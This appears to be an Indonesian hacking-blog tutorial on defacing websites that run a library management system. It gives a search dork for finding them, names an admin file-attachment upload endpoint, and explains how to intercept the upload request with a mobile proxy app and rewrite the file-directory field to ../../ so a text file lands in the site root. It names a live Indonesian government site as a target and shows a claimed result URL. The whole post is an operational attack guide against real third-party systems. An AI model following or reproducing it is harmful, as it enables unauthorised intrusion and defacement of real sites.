Deface Poc File Attachment Upload Repository Remove Path File

Deface Poc File Attachment Upload Repository Remove Path File - Pada Posts Kali Ini Saya Akan Share Tutorial Deface Poc File Attachment Upload Repository Remove Path File Dimana Kita Akan Deface Suatu Situs Dengan Mengupload File TXT. Next Tutorial.

Alat Tempur :

Dork : intext:"This Software is Released Under GNU GPL License Version 3"

Exploit : /admin/modules/bibliography/pop_attach.php

Sandro Proxy : Download

Lighting Browser : Download

Langkah Pertama :

Buka Aplikasi Sandro Proxy Aktifkan -> Developer Mode, Capture Data -> Klik Done Jika Sudah Buka Apk Lighting Browser.

Klik Titik Tiga Di Pojok Atas -> Settings -> General Settings -> HTTP Proxy -> Manual 

• Host : localhost
• Port : 8008

Buka Web Target Nya Menggunakan Apk Lighting Browser. Jika Belum Nemu Target Bisa Pakek Live Target : http://www.dilmiltama.go.id/dokpustak/admin/modules/bibliography/pop_attach.php?biblioID=0

Judul : Bisa Tulis Heked By:v

Upload File EXT : TXT

Jika Sudah Klik Upload Now

Masuk Lagi Ke Apk Sandro Proxy Klik HTTP Di Samping LOG -> Cari POST http://www.dilmiltama.go.id/dokpustak/admin/modules/bibliography/pop_attach.php -> Tekan Lama Tulisan Tersebut -> Manual Request.

Geser Kebawah Sampai Nemu Tulisan "File Dir" Isi Bawahnya Menjadi ../../ Jika Sudah Klik Play / Mulai.

Langkah Terakhir Kita Tinggal Mengaksesnya Saja, Cara Akses : http://www.dilmiltama.go.id/FileKalian.txt

Result :

http://www.dilmiltama.go.id/X.txt